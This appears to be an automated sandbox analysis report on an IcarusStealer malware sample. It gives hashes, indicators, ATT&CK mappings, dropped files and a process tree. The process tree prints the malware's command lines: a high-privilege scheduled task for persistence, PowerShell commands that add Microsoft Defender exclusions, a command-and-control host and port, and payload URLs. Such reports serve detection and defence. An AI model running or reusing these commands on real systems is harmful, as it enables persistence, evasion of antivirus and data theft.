icarusstealer | 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Analysis

max time kernel
150s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/03/2024, 22:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

custom111.exe
Size

24.9MB
MD5

4e1c29f0c1af62ddea916c6b80548c76
SHA1

38d9f15356b6a65f4e76ee739867d55b01493793
SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
SHA512

f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
SSDEEP

49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 6 IoCs

pid	Process
2964	Client.exe
2988	switched.exe
2704	pulse x loader.exe
2112	tesetey.exe
892	Start.exe
2256	$SXR.exe

Loads dropped DLL 6 IoCs

pid	Process
2360	custom111.exe
2360	custom111.exe
2988	switched.exe
2988	switched.exe
2668	cmd.exe
1380	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
15	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\CatRoot\$SXR\Read.txt	Client.exe
File created	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\$SXR.exe	Client.exe
File opened for modification	C:\Windows\System32\CatRoot\$SXR\Read.txt	$SXR.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2112 set thread context of 2644	2112	tesetey.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1536	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1484	timeout.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tesetey.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tesetey.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2112	tesetey.exe
892	Start.exe
2528	powershell.exe
852	powershell.exe
892	Start.exe
892	Start.exe
2964	Client.exe
2964	Client.exe
2964	Client.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe
892	Start.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	tesetey.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeDebugPrivilege	2644	cvtres.exe
Token: SeDebugPrivilege	892	Start.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	2964	Client.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeDebugPrivilege	2256	$SXR.exe
Token: SeDebugPrivilege	2256	$SXR.exe
Token: SeShutdownPrivilege	1572	explorer.exe
Token: SeShutdownPrivilege	1572	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

pid	Process
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe
1572	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 2964	2360	custom111.exe	28
PID 2360 wrote to memory of 2964	2360	custom111.exe	28
PID 2360 wrote to memory of 2964	2360	custom111.exe	28
PID 2360 wrote to memory of 2964	2360	custom111.exe	28
PID 2360 wrote to memory of 2988	2360	custom111.exe	29
PID 2360 wrote to memory of 2988	2360	custom111.exe	29
PID 2360 wrote to memory of 2988	2360	custom111.exe	29
PID 2360 wrote to memory of 2988	2360	custom111.exe	29
PID 2988 wrote to memory of 2704	2988	switched.exe	30
PID 2988 wrote to memory of 2704	2988	switched.exe	30
PID 2988 wrote to memory of 2704	2988	switched.exe	30
PID 2988 wrote to memory of 2704	2988	switched.exe	30
PID 2988 wrote to memory of 2112	2988	switched.exe	31
PID 2988 wrote to memory of 2112	2988	switched.exe	31
PID 2988 wrote to memory of 2112	2988	switched.exe	31
PID 2988 wrote to memory of 2112	2988	switched.exe	31
PID 2704 wrote to memory of 2648	2704	pulse x loader.exe	33
PID 2704 wrote to memory of 2648	2704	pulse x loader.exe	33
PID 2704 wrote to memory of 2648	2704	pulse x loader.exe	33
PID 2648 wrote to memory of 2628	2648	cmd.exe	35
PID 2648 wrote to memory of 2628	2648	cmd.exe	35
PID 2648 wrote to memory of 2628	2648	cmd.exe	35
PID 2648 wrote to memory of 2568	2648	cmd.exe	36
PID 2648 wrote to memory of 2568	2648	cmd.exe	36
PID 2648 wrote to memory of 2568	2648	cmd.exe	36
PID 2648 wrote to memory of 2604	2648	cmd.exe	37
PID 2648 wrote to memory of 2604	2648	cmd.exe	37
PID 2648 wrote to memory of 2604	2648	cmd.exe	37
PID 2112 wrote to memory of 2900	2112	tesetey.exe	38
PID 2112 wrote to memory of 2900	2112	tesetey.exe	38
PID 2112 wrote to memory of 2900	2112	tesetey.exe	38
PID 2112 wrote to memory of 2900	2112	tesetey.exe	38
PID 2900 wrote to memory of 2412	2900	csc.exe	39
PID 2900 wrote to memory of 2412	2900	csc.exe	39
PID 2900 wrote to memory of 2412	2900	csc.exe	39
PID 2900 wrote to memory of 2412	2900	csc.exe	39
PID 2112 wrote to memory of 1572	2112	tesetey.exe	40
PID 2112 wrote to memory of 1572	2112	tesetey.exe	40
PID 2112 wrote to memory of 1572	2112	tesetey.exe	40
PID 2112 wrote to memory of 1572	2112	tesetey.exe	40
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2668	2112	tesetey.exe	42
PID 2112 wrote to memory of 2668	2112	tesetey.exe	42
PID 2112 wrote to memory of 2668	2112	tesetey.exe	42
PID 2112 wrote to memory of 2668	2112	tesetey.exe	42
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 2112 wrote to memory of 2644	2112	tesetey.exe	41
PID 1572 wrote to memory of 1840	1572	explorer.exe	44
PID 1572 wrote to memory of 1840	1572	explorer.exe	44
PID 1572 wrote to memory of 1840	1572	explorer.exe	44
PID 2668 wrote to memory of 892	2668	cmd.exe	45
PID 2668 wrote to memory of 892	2668	cmd.exe	45
PID 2668 wrote to memory of 892	2668	cmd.exe	45
PID 2668 wrote to memory of 892	2668	cmd.exe	45
PID 1572 wrote to memory of 2216	1572	explorer.exe	46
PID 1572 wrote to memory of 2216	1572	explorer.exe	46
PID 1572 wrote to memory of 2216	1572	explorer.exe	46
PID 2644 wrote to memory of 2244	2644	cvtres.exe	47

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\custom111.exe
"C:\Users\Admin\AppData\Local\Temp\custom111.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp66BF.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:1380
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1484
  - - C:\Windows\System32\CatRoot\$SXR\$SXR.exe
      "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
        5⤵
        
        PID:600
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn "$SXR"
        6⤵
        
        PID:692
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA31B.tmp.bat""
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
        6⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpA31C.tmp.bat" "
        5⤵
        
        PID:1920
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
        6⤵
        
        PID:1676
- C:\Users\Admin\AppData\Local\Temp\switched.exe
  "C:\Users\Admin\AppData\Local\Temp\switched.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
    "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2648
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
        5⤵
        
        PID:2628
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:2568
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2604
- - C:\Users\Admin\AppData\Local\Temp\tesetey.exe
    "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fkmzrhs3\fkmzrhs3.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2900
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D84.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC21939969A3334B0EBD83DEA3FE3917B8.TMP"
        5⤵
        
        PID:2412
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies Installed Components in the registry
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1572
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:1840
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:2216
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
        5⤵
        
        PID:2244
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
        5⤵
        
        PID:2068
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:852
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Users\Admin\AppData\Local\Temp\Start.exe
        
        C:\Users\Admin\AppData\Local\Temp\Start.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab8D15.tmp

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
3.2MB

MD5
96605ff2ba53a43726305cac941fd2a9

SHA1
d1ef02047a89cf9f94ed776c690e37191ec4f144

SHA256
fa02a1cae524c1be9e68a77c3aec90ed2b7b59e0d9bf8845b4fc76bbe6d79ab8

SHA512
319881aa3e9266d1e0adedf94af3e1274ba130428f4c9f5b1d5e04d0bdabe8b4495b1744221d331df166c8d462d812bb757a6ab15924c45947501bd78fc9c741

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
2.8MB

MD5
2ec0a9af6e3e82b6eb15ac9299e3b8c9

SHA1
9f3f1278c4895c8dd239c66868c2f73b01d2cd4d

SHA256
37033021ec152f88d68c968c28e361025087fd86927aca175bc5e23fd8dda172

SHA512
3fd2b904669972ef2decafc34450bb32d0b4dce3827d1c8aa170e35129f2468bab9defad66654acce1729d07303a3b8acf7703d2727eb9ac8d972fd17408e62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4D84.tmp

Filesize
1KB

MD5
6b9a083a65bd69541034d04a419e1de2

SHA1
60b7c9b0ef4236c57ac99b91b84dfed13f95f8af

SHA256
8a94d00196e40150cf769fc041e28deef92d30710d905d4fa775170636661352

SHA512
bf477de0b0a990d6fea382245802777a41cbb34dcf745c5e00c828789a2f84797d4f9f126e82dc9519100fc5acbdc8d5128b962fbd7b9f35833d3e15082e10a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Start.exe

Filesize
4KB

MD5
ee45c0a3c1515ae2d044c86feb15feed

SHA1
b5450af0053fb9d0c87fc8a10fe822a0a9e037b4

SHA256
607d368371e130ae05030617e8642537f137d4254f209e00808c33c898077b18

SHA512
6016c456f77b501d1712694affc320573683331b9c2ce8b7edcae9f1b3d2c273df2223be046449ff6431d1e87f8a1b26493dd59b1dbba0c72a6d4d53185a47b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA163.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.7MB

MD5
b4454d81129c0068648c1b094eebb919

SHA1
3f3ac4bb5a5249c0d1cca9c10e979c9264f43a1d

SHA256
f2e244f323f35f62b114b4c7b29a3c104da224b547ed2c3d87847a2208386c4f

SHA512
f65ee938a66844ec068e5664c8c2166845f634c91a5d22a88b58b9298f622b4e35b8e2070bd9fe2343e91b1cc9d645236f6e17c6593df417fdc66fae78757072

Download Submit
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
1.2MB

MD5
e9c214de199d7c49981b73e0efb8428a

SHA1
8a2b0592b79ccc872bc9bb63a877675307a61fd4

SHA256
009ccf66b0bfe6586849ab4d50d509146816f1a3606e3e3874477871055501b9

SHA512
02ce0bb9bed240a339989e4c25406f48b8f8fc4cafb22908d131fbdf4ef2a11e3af2c90d7d53b39f841e8aeba9a701c3561d924bba3ff0032c56ebc584187c6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
2.5MB

MD5
4eedf1fd8387bb9abbe0bfa2a3094efa

SHA1
20c741456d9654b1edb556c6989022786b4b12da

SHA256
b64a14590bff2eaf723db4ae43c725c2d1d1090b4d9c9d8c1b2443bad19439d7

SHA512
646be46f6eb1a43a5720373ba815a6a6042cceedd5ce28322727f1705b5407659f81c1ee374152bf6a698c5e7583fc27752a49119c558228e59068b8c5e4324c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp66BF.tmp.bat

Filesize
150B

MD5
e97b1422bf55757e91c1f0cfd2cc5630

SHA1
1b299a971877024643fedb08c1b38ad7ee6dd9f5

SHA256
b79ba238c75feda2cbb99d6c14758d040c052128509bf205eb4425341d25ad81

SHA512
b0d4187c31d9fc72a98ca64ecf47dcc787a969cef505bdc60a05e23ee654c9aceb2f4595f53242ea78608a0b0d0d57c8a56d4a380c6cc65f21fb76177bdcf213

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA31B.tmp.bat

Filesize
102B

MD5
77254e2811a755365d545e1d3ff9f2d3

SHA1
a636da37c78d35f5ae4da354ba713828c84bbc1d

SHA256
93d089dd1ca2d4aceb2f1ba6af5576e5af340026e28a93bc3f65cf9a39674505

SHA512
109f6917181e2eb904f449bda73ee879258b3ecc943396662c3fb283e7ec0f723fc2b5ab1e17bc1c0400b51d8408869e126a76a81259cee48b7464d110ce84a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA31C.tmp.bat

Filesize
257B

MD5
f2697feb7becc5a54edb76e977ec4eac

SHA1
1d01d851e6d8fbe16f65450c63edacb1206db3ac

SHA256
150b2433a9af62aba783a7f63d71156246df6edd444a256fa86818a1f742af1d

SHA512
0cf118eb683a66810605994479cb4dc2c8c2d0602bf996704d0a447ec142a7e9e54046cddc9df0f3b27894e6ec91ee5fbf281e153c087cb03664c3e1aaa22803

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
bd879fd72701515c9018ce7526ccff48

SHA1
eab0b6413cdc7c6434095f325f2a686323619d24

SHA256
f15188c01cdcceff726e5c13981000fbf4468be4982c8d9e7d8c69f0b533789f

SHA512
2414af9b32db3c8a89b827b7bfd6432d686e9bb5ba190c5a92ac4880c230651c9482f89c6165b8c9e025609a168880848e3be55de25dfabb1155aa09cb06ef62

Download Submit
C:\Windows\System32\CatRoot\$SXR\$SXR.exe

Filesize
473KB

MD5
b6561eec7b123aac49efacdb3444d489

SHA1
1a91eaf4b40443f16b2719ad822b1697f899088c

SHA256
79d0cdd20939a6a8b15b8552f3a491011f122a9be38275315a746066e3b7183f

SHA512
33bbd63a5abe9bb0788f996ae7df17dbe0ef54d3f9a1aca377195330aa8e471ed35887c04352eb4db330454a9c21e6873e437e55754c244a921df8bea5eb238f

Download Submit
C:\Windows\System32\CatRoot\$SXR\Read.txt

Filesize
58B

MD5
79668a6729f0f219835c62c9e43b7927

SHA1
0cbbc7cc8dbd27923b18285960640f3dad96d146

SHA256
6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

SHA512
bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

Download Submit
C:\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
368KB

MD5
368cd05f08475cbf7ce3d84f2d94aa30

SHA1
350fab4bf1fe16a11588822799adfbfa75eb4411

SHA256
e7e74cf7616d60d83d47ca32db37801cc06eb28c1770f6eb2c78d1d4a1d4da90

SHA512
